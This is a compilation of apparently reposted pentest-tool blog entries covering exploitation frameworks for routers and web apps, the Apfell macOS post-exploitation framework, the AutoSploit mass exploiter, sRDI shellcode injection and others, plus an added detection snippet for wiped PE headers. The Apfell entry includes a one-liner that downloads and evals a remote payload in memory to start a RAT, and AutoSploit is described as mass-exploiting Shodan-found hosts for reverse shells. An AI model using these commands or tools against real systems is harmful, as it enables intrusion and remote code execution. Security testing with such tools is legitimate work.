EKFiddle – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.

Installation

Download and install the latest version of Fiddler: https://www.telerik.com/fiddler
Special instructions for Linux and Mac here:
https://www.telerik.com/blogs/fiddler-for-linux-beta-is-here
https://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1

Enable C# scripting (Windows only)
Launch Fiddler, and go to Tools -> Options. In the Scripting tab, change the default (JScript.NET) to C#.

Change default text editor (optional)
In the same Tools -> Options menu, click on the Tools tab.
Windows: notepad.exe or notepad++.exe
Linux: gedit
Mac: /Applications/TextEdit.app or /Applications/TextWrangler.app

Close Fiddler

Download or clone CustomRules.cs into the appropriate folder based on your operating system:
Windows (7/10): C:\Users\[username]\Documents\Fiddler2\Scripts\
Ubuntu: /home/[username]/Fiddler2/Scripts/
Mac: /Users/[username]/Fiddler2/Scripts/

Finish up the installation
Start Fiddler to complete the installation of EKFiddle. That's it, you're all set!

Features

Toolbar buttons
The added toolbar buttons give you quick shortcuts to some of the main features:

QuickSave: Dumps current web sessions into a SAZ named QuickSave-"MM-dd-yyyy-HH-mm-ss".saz in EKFiddle\Captures.
UI mode: Toggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).
VPN: VPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with .ovpn files (signing up with a commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous one to ensure only one TAP adapter is used at any given time.
Windows: Download and install OpenVPN in the default directory. Place your .ovpn files inside OpenVPN's config folder.
Linux (tested on Ubuntu 16.04): sudo apt-get install openvpn. Place your .ovpn files in /etc/openvpn.
Proxy: Allows you to connect to an upstream proxy (HTTP/s or SOCKS).
Import SAZ/PCAP: A shortcut to load SAZ (Fiddler's native format) or PCAP (i.e. from Wireshark) captures.
View/Edit Regexes: View and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.
Run Regexes: Run the master and custom regular expressions against current web sessions.
Clear Markings: Clear any comment and colour highlighting in the currently loaded sessions.

ContextAction menu
The ContextAction menu (accessed by right-clicking on any session(s)) allows you to perform additional commands on the selected sessions. This can be very helpful to do quick lookups, compute hashes or extract IOCs.

Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ): Query the hostname for the currently selected session.

URI
Build Regex: Create a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
Open in... Internet Explorer, Chrome, Firefox, Edge: This opens up the URI with the browser you selected.

Response Body
Remove encoding: Decodes the currently selected sessions (from their basic encoding).
Build Regex: Create a regular expression from the currently selected session's source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.
Calculate MD5/SHA256 hash: Gets the current session's body and computes its hash.
Hybrid Analysis / VirusTotal lookup: Checks the current session's body for its hash, then looks up that hash.
Extract to Disk: Downloads the currently selected session(s)' body to disk, into the 'Artifacts' folder.
Extract IOCs: Copies into memory basic information from the selected sessions so that they can be shared as IOCs.
Connect-the-dots: Allows you to identify the sequence of events between sessions. Right-click on the session you are interested in retracing your steps to and simply 'connect the dots'. It will label the sequence of events from 01 to n within the comments column. You can reorder that column to have a condensed view of the sequence.

Crawler
Load a list of URLs from a text file and let the browser automatically visit them: Tools -> Crawler (experimental) -> Start crawler
May require some tweaks in your browser's settings, in particular with regards to crash recovery:
IE: not needed
Firefox: about:config, set -1 value for toolkit.startup.max_resumed_crashes
Chrome: not needed
Edge: fix already included

Uninstalling EKFiddle
Delete CustomRules.cs

Download EKFiddle

Link: http://feedproxy.google.com/~r/PentestTools/~3/OrfyeIMprN4/ekfiddle-framework-based-on-fiddler-web.html

RouterSploit v3.3.0 – Exploitation Framework For Embedded Devices

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.

It consists of various modules that aid penetration testing operations:
exploits – modules that take advantage of identified vulnerabilities
creds – modules designed to test credentials against network services
scanners – modules that check if a target is vulnerable to any exploit
payloads – modules that are responsible for generating payloads for various architectures and injection points
generic – modules that perform generic attacks

Installation

Requirements
Required:
future
requests
paramiko
pysnmp
pycrypto
Optional:
bluepy – bluetooth low energy

Installation on Kali Linux
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on Ubuntu 18.04 & 17.10
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on OSX
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Running on Docker
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull

Download Routersploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/bGEb3P4Ibw4/routersploit-v330-exploitation.html

TIDoS Framework – The Offensive Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. Let's keep this simple.

Highlights :-
The main highlights of this framework are:
TIDoS Framework now boasts of a century+ of modules.
A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.
Has 5 main phases, subdivided into 14 sub-phases consisting of a total of 104 modules.
Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).
Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc).
Vulnerability Analysis Phase has 36 modules (including most common vulnerabilities in action).
Exploits Castle has only 1 exploit (purely developmental).
And finally, Auxiliaries have got 4 modules (under dev).
All four phases each have an Auto-Awesome module which automates every module for you.
You just need the domain, and leave everything else to this tool.
TIDoS has full verbose output support, so you'll know what's going on.
Fully user friendly interaction environment (no shits).

Installation :
Clone the repository locally and navigate there:
git clone https://github.com/theinfecteddrake/tidos-framework.git
cd tidos-framework
Install the dependencies:
chmod +x install
./install
That's it! Now you are good to go! Now let's run the tool:
tidos

Getting Started :-
TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.
But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under the files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!
Finally, as the framework opens up, enter the website name, e.g. http://www.example.com, and let TIDoS lead you. That's it! It's as easy as that.
Recommended: Follow the order of the tool (run in a schematic way): Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis
To update this tool, use the tidos_updater.py module under the tools/ folder.

Flawless Features :-
TIDoS Framework presently supports the following (and is under active development):

Reconnaissance + OSINT

Passive Reconnaissance:
Nping Enumeration – via external API
WhoIS Lookup – domain info gathering
GeoIP Lookup – pinpoint physical location
DNS Configuration Lookup – DNSDump
Subdomains Lookup – indexed ones
Reverse DNS Lookup – host instances
Reverse IP Lookup – hosts on same server
Subnets Enumeration – class based
Domain IP History – IP instances
Web Links Gatherer – indexed ones
Google Search – manual search
Google Dorking (multiple modules) – automated
Email to Domain Resolver – email WhoIs
Wayback Machine Lookups – find backups
Breached Email Check – pwned email accounts
Enumeration via Google Groups – emails only
Check Alias Availability – social networks
Find PasteBin Posts – domain based
LinkedIn Gathering – employees & company
Google Plus Gathering – domain profiles
Public Contact Info Scraping – FULL CONTACT
Censys Intel Gathering – domain based
Threat Intelligence Gathering – bad IPs

Active Reconnaissance:
Ping Enumeration – advanced
CMS Detection (185+ CMSs supported) – IMPROVED
Advanced Traceroute – IMPROVED
robots.txt and sitemap.xml Checker
Grab HTTP Headers – live capture
Find HTTP Methods Allowed – via OPTIONS
Detect Server Type – IMPROVED
Examine SSL Certificate – absolute
Apache Status Disclosure Checks – file based
WebDAV HTTP Enumeration – PROPFIND & SEARCH
PHPInfo File Enumeration – via bruteforce
Comments Scraper – regex based
Find Shared DNS Hosts – name server based
Alternate Sites Discovery – User-Agent based
Discover Interesting Files via Bruteforce:
Common Backdoor Locations – shells, etc.
Common Backup Locations – .bak, .db, etc.
Common Password Locations – .pgp, .skr, etc.
Common Proxy Path Configs – .pac, etc.
Common Dot Files – .htaccess, .apache, etc.

Information Disclosure:
Credit Cards Disclosure – if plaintext
Email Harvester – IMPROVED
Fatal Errors Enumeration – includes Full Path Disclosure
Internal IP Disclosure – signature based
Phone Number Harvester – signature based
Social Security Number Harvester – US ones

Scanning & Enumeration

Remote Server WAF Enumeration – generic, 54 WAFs
Port Scanning – ingenious modules:
Simple Port Scanner – via socket connections
TCP SYN Scan – highly reliable
TCP Connect Scan – highly reliable
XMAS Flag Scan – reliable only in LANs
FIN Flag Scan – reliable only in LANs
Port Service Detector
Web Technology Enumeration – absolute
Operating System Fingerprinting – IMPROVED
Banner Grabbing of Services – via open ports
Interactive Scanning with NMap – 16 preloaded modules
Enumeration of Domain-Linked IPs – using CENSYS database
Web and Links Crawlers:
Depth 1 – indexed URI crawler
Depth 2 – single page crawler
Depth 3 – web link crawler

Vulnerability Analysis

Web-Bugs & Server Misconfigurations:
Insecure CORS – absolute
Same-Site Scripting – sub-domain based
Zone Transfer – DNS server based
Clickjacking: Frame-Busting Checks; X-FRAME-OPTIONS Header Checks
Security on Cookies: HTTPOnly Flag; Secure Flag
Cloudflare Misconfiguration Check: DNS Misconfiguration Checks; Online Database Lookup For Breaches
HTTP Strict Transport Security Usage: HTTPS Enabled but no HSTS
Domain Based Email Spoofing: Missing SPF Records; Missing DMARC Records
Host Header Injection: Port Based; Over HTTP 80; X-Forwarded-For Header Injection
Security Headers Analysis – live capture
Cross-Site Tracing – HTTP TRACE Method
Session Fixation via Cookie Injection
Network Security Misconfig.: Checks for TELNET Enabled via Port 23

Serious Web Vulnerabilities:
File Inclusions: Local File Inclusion (LFI) – param based; Remote File Inclusion (RFI) – IMPROVED: parameter based, pre-loaded path based
OS Command Injection – Linux & Windows (RCE)
Path Traversal (Sensitive Paths)
Cross-Site Request Forgery – absolute
SQL Injection:
Error Based Injection: Cookie Value Based; Referer Value Based; User-Agent Value Based; Auto-gathering – IMPROVED
Blind Based Injection – crafted payloads: Cookie Value Based; Referer Value Based; User-Agent Value Based; Auto-gathering – IMPROVED
LDAP Injection – parameter based
HTML Injection – parameter based
Bash Command Injection – ShellShock
XPATH Injection – parameter based
Cross-Site Scripting – IMPROVED: Cookie Value Based; Referer Value Based; User-Agent Value Based; Parameter Value Based (manual)
Unvalidated URL Forwards – Open Redirect
PHP Code Injection – Windows + Linux
HTTP Response Splitting – CRLF Injection: User-Agent Value Based; Parameter Value Based (manual)
Sub-domain Takeover – 50+ services: Single Sub-domain (manual); All Subdomains (automated)

Other:
PlainText Protocol Default Credential Bruteforce: FTP Protocol Bruteforce; SSH Protocol Bruteforce; POP 2/3 Protocol Bruteforce; SQL Protocol Bruteforce; XMPP Protocol Bruteforce; SMTP Protocol Bruteforce; TELNET Protocol Bruteforce

Auxiliary Modules
Hash Generator – MD5, SHA1, SHA256, SHA512
String & Payload Encoder – 7 categories
Forensic Image Analysis – metadata extraction
Web HoneyPot Probability – ShodanLabs HoneyScore

Exploitation (purely developmental)
ShellShock

Other Tools:
net_info.py – Displays information about your network. Located under tools/.
tidos_updater.py – Updates the framework to the latest release via signature matching. Located under tools/.

TIDoS In Action:

Version:
v1.6 [latest release] [#stable]

Upcoming:
There are some bruteforce modules to be added.
Some more Enumeration & Information Disclosure modules.
Lots more OSINT & stuff (let that be a suspense).
More Auxiliary modules.
Some exploits are also being worked on.

Known Bugs:
This version of TIDoS is purely developmental and is presently stable. There are bugs in resolving the [99] Back at various end-points which result in blind fall-backs. Though I have added global exception handling, still, there may be bugs out there. Also TIDoS needs to develop more on logging all info displayed on the screen (help needed).

Disclaimer:
TIDoS is provided as an offensive web application audit framework. It has built-in modules which can reveal potential misconfigurations and vulnerabilities in web applications which could possibly be exploited maliciously.
THEREFORE, I AM NOT EXCLUSIVELY RESPONSIBLE FOR ANY MISUSE OF THIS TOOLKIT.

Download TIDoS-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/dCgUcSrbBrM/tidos-framework-offensive-web.html

Apfell – A macOS, Post-Exploit, Red Teaming Framework

A macOS, post-exploit, red teaming framework built with python3 and JavaScript. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout mac and linux based red teaming.

Details
Check out the blog post on the initial release of the framework and what the bare bones content can do.

Installation
Get the code from this github:
git clone https://github.com/its-a-feature/Apfell

Install and set up the requirements (Note: the Sanic webserver says it only works on Linux):
# The setup.sh will install postgres and pip3 install the requirements
cd Apfell && chmod +x setup.sh && sudo ./setup.sh && cd ..

Configure the installation in app/__init__.py:
# -------- CONFIGURE SETTINGS HERE -----------
db_name = 'apfell_db'
db_user = 'apfell_user'
db_pass = 'super_secret_apfell_user_password'
server_ip = '127.0.0.1'  # this will be used by the browser to callback here, edit this!
listen_port = '443'
listen_ip = '0.0.0.0'  # IP to bind to for the server, 0.0.0.0 means all local IPv4 addresses
ssl_cert_path = './app/ssl/apfell-cert.pem'
ssl_key_path = './app/ssl/apfell-ssl.key'
use_ssl = True

There is currently an issue with Sanic and websockets 6/7 (tracked issue, but no pull request yet). You need to edit Sanic with a slight update (I'm going to make a pull request for Sanic so we don't need to do this, but that'll take a little while). In the meantime, do sudo find / -type f -name "app.py" to find the appropriate Sanic file to edit. In there, find the line that says protocol = request.transport._protocol and edit it to be:
if hasattr(request.transport, '_app_protocol'):
    protocol = request.transport._app_protocol
else:
    protocol = request.transport._protocol

Usage
Start the server:
python3 server.py
[2018-07-16 14:39:14 -0700] [28381] [INFO] Goin' Fast @ https://0.0.0.0:443

By default, the server will bind to 0.0.0.0 on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don't actually browse to https://0.0.0.0:443 in your browser. Instead, you'll browse to either https://localhost:443 if you're on the same machine that's running the server, or you can browse to any of the IPv4 addresses on the machine that's running the server. You could also browse to the IP address you specified in server_ip = '192.168.0.119' in the installation section.

Browse to the server with any modern web browser.
Create a new user.
Create a new payload.
Use the attacks_api to host the new file (this will eventually get updated with a GUI):
# assuming we created a payload in our local '/tmp' directory
curl -X POST -d '{"port":8080, "directory":"/tmp"}' https://192.168.0.119/api/v1.0/attacks/host_file
This will start a python simple web server in the /tmp directory on port 8080.
Pull down and execute the payload in memory:
osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('HTTP://192.168.0.119:8080/apfell-jxa')),$.NSUTF8StringEncoding)));"
Interact with the new RAT.

Download Apfell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9wqU15O2-l4/apfell-macos-post-exploit-red-teaming.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye, but options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started.

Operational Security Consideration
Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the required dependencies available.
The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

Helpful links
Usage
Installing
Dependencies
User Manual (extensive usage breakdown)
Screenshots
Reporting bugs/ideas
Development guidelines
Shoutouts
Development
Discord server
README translations

Installation
Installing AutoSploit is very simple; you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the methods below.

Cloning
sudo -s << EOF
git clone https://github.com/NullArray/Autosploit.git
cd AutoSploit
chmod +x install.sh
./install.sh
python2 autosploit.py
EOF

Docker
sudo -s << EOF
git clone https://github.com/NullArray/AutoSploit.git
cd AutoSploit
chmod +x install.sh
./install.sh
cd AutoSploit/Docker
docker network create -d bridge haknet
docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
docker build -t autosploit .
docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit
EOF

On any Linux system the following should work:
git clone https://github.com/NullArray/AutoSploit
cd AutoSploit
chmod +x install.sh
./install.sh

If you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS; however, you have to be inside a virtual environment for it to run successfully. To do this, do the following:
sudo -s << '_EOF'
pip2 install virtualenv --user
git clone https://github.com/NullArray/AutoSploit.git
virtualenv <PATH-TO-YOUR-ENV>
source <PATH-TO-YOUR-ENV>/bin/activate
cd <PATH-TO-AUTOSPLOIT>
pip2 install -r requirements.txt
chmod +x install.sh
./install.sh
python autosploit.py
_EOF

More information on running Docker can be found here.

Usage
Starting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows:
1. Usage And Legal
2. Gather Hosts
3. Custom Hosts
4. Add Single Host
5. View Gathered Hosts
6. Exploit Gathered Hosts
99. Quit

Choosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache, for example, and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.

As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I've posted the options below as well for reference.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT
                            [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use

  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests

  --proxy PROTO://IP:PORT
                        run behind a proxy while performing the searches
  --random-agent        use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT
                        pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY
                        pass your search query

exploits:
  arguments to edit your exploits

  -E PATH, --exploit-file PATH
                        provide a text file to convert into JSON and save for later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                        set the configuration for MSF (IE -C default 127.0.0.1 8080)
  -e, --exploit         start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else

  --ruby-exec           if you need to run the Ruby executable with MSF use this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies
Note: All dependencies should be installed using the above installation method; however, if you find they are not:
AutoSploit depends on the following Python2.7 modules:
requests
psutil
Should you find you do not have these installed, get them with pip like so:
pip install requests psutil
or
pip install -r requirements.txt
Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

OWTF v2.4 – Offensive Web Testing Framework

OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST so that pentesters will have more time to:
See the big picture and think out of the box
More efficiently find, verify and combine vulnerabilities
Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
Perform more tactical/targeted fuzzing on seemingly risky areas
Demonstrate true impact despite the short timeframes we are typically given to test.

The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience.
Note: This tool is however not a silver bullet and will only be as good as the person using it: understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.

Requirements
OWTF is developed on Kali Linux and macOS but it is made for Kali Linux (or other Debian derivatives).
OWTF supports both Python2 and Python3.

Installation
Recommended:
Using a virtualenv is highly recommended!
pip install git+https://github.com/owtf/owtf#egg=owtf
or clone the repo and
python setup.py install

If you want to change the database password in the Docker Compose setup, edit the environment variables in the docker-compose.yml file. If you prefer to override the environment variables in a .env file, use the file name owtf.env so that Docker Compose knows to include it.
To run OWTF on Windows or MacOS, OWTF uses Docker Compose. You need to have Docker Compose installed (check by docker-compose -v). After installing Docker Compose, simply run docker-compose up and open localhost:8009 for the OWTF web interface.

Install on OSX
Dependencies: Install Homebrew (https://brew.sh/) and follow the steps given below:
$ virtualenv <venv name>
$ source <venv name>/bin/activate
$ brew install coreutils gnu-sed openssl
# We need to install 'cryptography' first to avoid issues
$ pip install cryptography --global-option=build_ext --global-option="-L/usr/local/opt/openssl/lib" --global-option="-I/usr/local/opt/openssl/include"
$ git clone <this repo>
$ cd owtf
$ python setup.py install
# Run OWTF!
$ owtf

Features
Resilience: If one tool crashes, OWTF will move on to the next tool/test, saving the partial output of the tool until it crashed.
Flexible: Pause and resume your work.
Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:
Passive: No traffic goes to the target
Semi Passive: Normal traffic to target
Active: Direct vulnerability probing
Extensive REST API.
Has almost complete OWASP Testing Guide (v3, v4), Top 10, NIST, CWE coverage.
Web interface: Easily manage large penetration engagements.
Interactive report:
Automated plugin rankings from the tool output, fully configurable by the user.
Configurable risk rankings
In-line notes editor for each plugin.

Links
Project homepage
IRC
Wiki
Slack (and join channel #project-owtf)
User Documentation
Youtube channel
Slideshare
Blog

Screenshots

Download OWTF

Link: http://feedproxy.google.com/~r/PentestTools/~3/QhjPP8mfh-A/owtf-v24-offensive-web-testing-framework.html

sRDI – Shellcode Implementation Of Reflective DLL Injection

sRDI allows for the conversion of DLL files to position independent shellcode. Functionality is accomplished via two components:
C project which compiles a PE loader implementation (RDI) to shellcode
Conversion code which attaches the DLL, RDI, and user data together with a bootstrap

This project is comprised of the following elements:
ShellcodeRDI: Compiles shellcode for the DLL loader
NativeLoader: Converts DLL to shellcode if necessary, then injects into memory
DotNetLoader: C# implementation of NativeLoader
Python\ConvertToShellcode.py: Convert DLL to shellcode in place
Python\EncodeBlobs.py: Encodes compiled sRDI blobs for static embedding
PowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in place
FunctionTest: Imports sRDI C function for debug testing
TestDLL: Example DLL that includes two exported functions for call on Load and after

The DLL does not need to be compiled with RDI; however, the technique is cross compatible.

Use Cases / Examples
Before use, it is recommended that you become familiar with Reflective DLL Injection and its purpose.

Convert DLL to shellcode using python
from ShellcodeRDI import *
dll = open("TestDLL_x86.dll", 'rb').read()
shellcode = ConvertToShellcode(dll)

Load DLL into memory using C# loader
DotNetLoader.exe TestDLL_x64.dll

Convert DLL with python script and load with Native EXE
python ConvertToShellcode.py TestDLL_x64.dll
NativeLoader.exe TestDLL_x64.bin

Convert DLL with powershell and load with Invoke-Shellcode
Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

Stealth Considerations
There are many ways to detect memory injection. The loader function implements two stealth improvements on traditional RDI:
Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.
PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completely wiped with null bytes on load (except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/Powershell.

Building
This project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.
The Python and Powershell scripts are located at:
Python\ConvertToShellcode.py
PowerShell\ConvertTo-Shellcode.ps1
After building the project, the other binaries will be located at:
bin\NativeLoader.exe
bin\DotNetLoader.exe
bin\TestDLL_.dll
bin\ShellcodeRDI_.bin

Download sRDI
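The PE Header Cleaning behaviour described above leaves a recognisable artifact for a memory scanner: an NT signature still reachable through e_lfanew while the MZ header and DOS stub around it are all nulls. The check below, an added detection-side example and not sRDI's own code, classifies the first bytes of an image that way; the sample image heads are constructed inline (256 bytes, NT headers at 0x80, no real sections).

```python
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
E_LFANEW_OFFSET = 0x3C  # DWORD in IMAGE_DOS_HEADER pointing at the NT headers


def classify_image_head(buf: bytes) -> str:
    """Classify the start of a (possibly mapped) image.

    "normal_pe"          - MZ header intact and NT signature at e_lfanew
    "wiped_dos_header"   - NT signature at e_lfanew, but every byte before it
                           except the e_lfanew field itself is null: the
                           header-cleaning pattern described for sRDI
    "damaged_dos_header" - NT signature reachable but MZ missing and the
                           DOS region is not all nulls
    "not_pe"             - no NT signature reachable through e_lfanew
    """
    if len(buf) < E_LFANEW_OFFSET + 4:
        return "not_pe"
    e_lfanew = struct.unpack_from("<I", buf, E_LFANEW_OFFSET)[0]
    # e_lfanew must land inside the buffer and past the DOS header itself
    if e_lfanew < E_LFANEW_OFFSET + 4 or e_lfanew + 4 > len(buf):
        return "not_pe"
    if buf[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        return "not_pe"
    if buf[:2] == IMAGE_DOS_SIGNATURE:
        return "normal_pe"
    # DOS header + stub with the e_lfanew field cut out
    dos_region = buf[:E_LFANEW_OFFSET] + buf[E_LFANEW_OFFSET + 4:e_lfanew]
    if not any(dos_region):
        return "wiped_dos_header"
    return "damaged_dos_header"


def build_sample(wipe_dos: bool) -> bytes:
    """Constructed 256-byte image head: MZ header, a DOS stub fragment,
    e_lfanew = 0x80 and the NT signature there (no sections follow)."""
    e_lfanew = 0x80
    head = bytearray(e_lfanew)
    head[:2] = IMAGE_DOS_SIGNATURE
    head[0x40:0x40 + 12] = b"This program"  # fragment of the usual DOS stub
    struct.pack_into("<I", head, E_LFANEW_OFFSET, e_lfanew)
    if wipe_dos:
        # Mimic the described cleaning: null everything except e_lfanew
        e_lfanew_bytes = bytes(head[E_LFANEW_OFFSET:E_LFANEW_OFFSET + 4])
        head = bytearray(e_lfanew)
        head[E_LFANEW_OFFSET:E_LFANEW_OFFSET + 4] = e_lfanew_bytes
    tail = IMAGE_NT_SIGNATURE + b"\0" * (0x100 - e_lfanew - 4)
    return bytes(head) + tail


if __name__ == "__main__":
    for label, wipe in (("intact", False), ("cleaned", True)):
        print(label, "->", classify_image_head(build_sample(wipe)))
```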

Link: http://feedproxy.google.com/~r/PentestTools/~3/L7k0Is7EfEY/srdi-shellcode-implementation-of.html

Pure Blood v2.0 – A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter

A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter.

Web Pentest / Information Gathering:
Banner Grab
Whois
Traceroute
DNS Record
Reverse DNS Lookup
Zone Transfer Lookup
Port Scan
Admin Panel Scan
Subdomain Scan
CMS Identify
Reverse IP Lookup
Subnet Lookup
Extract Page Links
Directory Fuzz (NEW)
File Fuzz (NEW)
Shodan Search (NEW)
Shodan Host Lookup (NEW)

Web Application Attack: (NEW)
Wordpress
| WPScan
| WPScan Bruteforce
| WordPress Plugin Vulnerability Checker
Features: // I will add more soon.
| WordPress Woocommerce – Directory Traversal
| WordPress Plugin Booking Calendar 3.0.0 – SQL Injection / Cross-Site Scripting
| WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion
| WordPress Plugin Events Calendar – 'event_id' SQL Injection
Auto SQL Injection
Features:
| Union Based
| (Error Output = False) Detection
| Tested on 100+ Websites

Generator:
Deface Page
Password Generator // NEW
Text To Hash // NEW

Installation
Any Python Version.
$ git clone https://github.com/cr4shcod3/pureblood
$ cd pureblood
$ pip install -r requirements.txt

DEMO
Web Pentest
Web Application Attack

Build With
Colorama
Requests
Python-whois
Dnspython
BeautifulSoup
Shodan

Authors
Cr4sHCoD3 – Pure Blood

Download Pure Blood v2.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/PcrKCodaoSA/pure-blood-v20-penetration-testing.html

Pure Blood – A Penetration Testing Framework Created For Hackers / Pentester / Bug Hunter

A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter.

Menu
Web Pentest
| Banner Grab
| Whois
| Traceroute
| DNS Record
| Reverse DNS Lookup
| Zone Transfer Lookup
| Port Scan
| Admin Panel Scan
| Subdomain Scan
| CMS Identify
| Reverse IP Lookup
| Subnet Lookup
| Extract Page Links
Generator
| Deface Page

Installation
Any Python Version.

Modules
$ pip install -r requirements.txt
OR
$ pip install colorama requests python-whois dnspython bs4

Path (Optional)
Linux
$ sudo nano ~/.bashrc
# Add this at the bottom of the file
export PATH=$PATH:/pureblood
$ pureblood.py

Windows
Windows Search > Edit The System Environment Variables > Environment Variables > Path > Edit > New > (Path to the Tool) > Ok > Ok > Apply / Ok
$ pureblood

MAC
$ nano /etc/paths
# Add this at the bottom of the file
export PATH=$PATH:<Path of the Tool>/pureblood/
$ pureblood.py

Android (Termux / GNURoot)
$ nano ~/.bashrc
# Add this at the bottom of the file
export PATH=$PATH:<Path of the Tool>/pureblood/
$ pureblood.py

Build With
Colorama
Requests
Python-whois
Dnspython
BeautifulSoup

Authors
Cr4sHCoD3 – Pure Blood

Download Pureblood

Link: http://feedproxy.google.com/~r/PentestTools/~3/Rj8IZDAp3ZU/pure-blood-penetration-testing.html

Orbit – Cryptocurrency Wallets Relationship Visualizer

Give it a blockchain based crypto wallet address and it will crawl 3 levels deep in transaction data to plot a graph out of the information.

Usage
Run orbit.py with python3 as follows:
python3 orbit.py
Enter the wallet address when prompted:
Enter a wallet address: xxxxxxxxxxxxxxx
